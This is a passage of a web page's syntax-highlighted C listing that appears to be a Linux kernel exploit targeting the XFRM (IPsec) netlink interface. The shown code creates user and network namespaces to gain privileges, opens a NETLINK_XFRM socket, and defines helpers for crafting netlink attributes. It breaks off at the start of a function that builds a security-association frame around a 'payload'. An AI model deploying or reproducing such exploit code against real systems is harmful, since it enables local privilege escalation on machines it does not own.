class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-14\"><span class=\"crayon-p\">#include &lt;linux\/netlink.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-15\"><span class=\"crayon-p\">#include &lt;linux\/xfrm.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-16\"><span class=\"crayon-p\">#include &lt;linux\/irda.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-17\"><span class=\"crayon-p\">#include &lt;fcntl.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-18\"><span class=\"crayon-p\">#include &lt;sched.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-19\"><span class=\"crayon-p\">#include &lt;unistd.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-22\"><span class=\"crayon-p\">#define NLA_LENGTH(len)\t\t\t\t\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">NLA_ALIGN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nlattr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-24\"><span class=\"crayon-p\">#define NLMSG_TAIL(nmsg)\t\t\t\t\t\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nlattr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">nmsg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NLMSG_ALIGN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">nmsg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-26\"><span class=\"crayon-p\">#define NLA_DATA(nla)\t\t\t\t\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">nla<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NLA_LENGTH<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-28\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-29\"><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">saddr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;1111111122222222&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-30\"><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">daddr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;3333333344444444&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-32\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr_nl <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-33\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">req_newae<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-34\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">nlmsghdr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-35\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xfrm_aevent_id <\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-36\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2048<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-37\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-39\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">req_newsa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-40\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">nlmsghdr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-41\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xfrm_usersa_info <\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-42\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2048<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-43\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-45\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-46\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-47\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">unshare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CLONE_NEWUSER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CLONE_NEWNET<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-48\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;unshare(CLONE_NEWUSER)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-49\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-50\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-51\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-53\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_netlink_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-54\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-55\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-57\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">AF_NETLINK<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">SOCK_RAW<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">NETLINK_XFRM<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-58\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-59\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;socket&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-60\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-61\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-63\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-64\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AF_NETLINK<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-65\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_pid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* packet goes into the kernel *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-66\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_groups<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRMNLGRP_NONE<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* no need for multicast group *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-67\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-68\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-69\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nlmsghdr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-70\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-71\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-72\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sendto<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-73\"><span class=\"crayon-h\">\t\t&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-74\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-75\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;sendto&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-76\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-77\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-78\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-79\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-80\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-82\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">add_attr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nlmsghdr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">maxlen<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">attrlen<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-83\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-84\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nlattr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">nl<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-85\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NLA_LENGTH<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">attrlen<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-86\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-87\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NLMSG_TAIL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-88\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nl<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nla_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-89\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nl<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nla_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-90\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">NLA_DATA<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">attrlen<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-91\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">NLMSG_ALIGN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NLA_ALIGN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-92\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-93\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-94\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-95\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req_newsa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-e\">build_sa_frame<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">u_int32_t <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-96\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-97\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req_newsa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-98\"><span class=\"crayon-h\">\t<\/span><span 